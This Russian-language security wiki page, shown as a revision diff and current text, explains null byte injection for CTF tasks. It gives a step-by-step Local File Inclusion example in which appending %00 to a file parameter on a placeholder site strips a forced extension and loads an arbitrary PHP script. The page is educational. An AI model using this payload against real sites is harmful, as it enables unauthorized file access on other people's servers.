NULL — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) (Новая страница: «Null Byte Injection - уязвимость нулевого байта, распространенная как в PWN, так и Web тасках. =Null Byte…») |
Drakylar (обсуждение | вклад) м (→Null Byte LFI) |
||
Строка 4: | Строка 4: | ||
=Null Byte в Web= | =Null Byte в Web= | ||
− | == | + | ==LFI== |
Чаще всего она распространена именно в [[:lfi|Local File Inclusion]]. | Чаще всего она распространена именно в [[:lfi|Local File Inclusion]]. |
Версия 18:56, 22 февраля 2016
Null Byte Injection - уязвимость нулевого байта, распространенная как в PWN, так и Web тасках.
Null Byte в Web
LFI
Чаще всего она распространена именно в Local File Inclusion.
Про Local File Inclusion вы можете прочитать в соответствующей статье, тут достаточно привести пример эксплуатации.
1. Есть LFI:
http://site.ru/folder/index.php?file=image
2. При попытке подгрузить скрипт, либо его не показывает, либо пишет, что файл не найден:
http://site.ru/folder/index.php?file=PHP_SCRIPT.php
3. Понятное дело, что к нашему вводу приписывается оканчание .png(или любой другой формат картинки)
http://site.ru/folder/index.php?file=image ==> file = image+ '.png'
4. Добавляем оканчание %00 и отбрасываем все следовавшее после:
http://site.ru/folder/index.php?file=PHP_SCRIPT.php%00
5. Получаем подгруженный PHP-скрипт. Profit!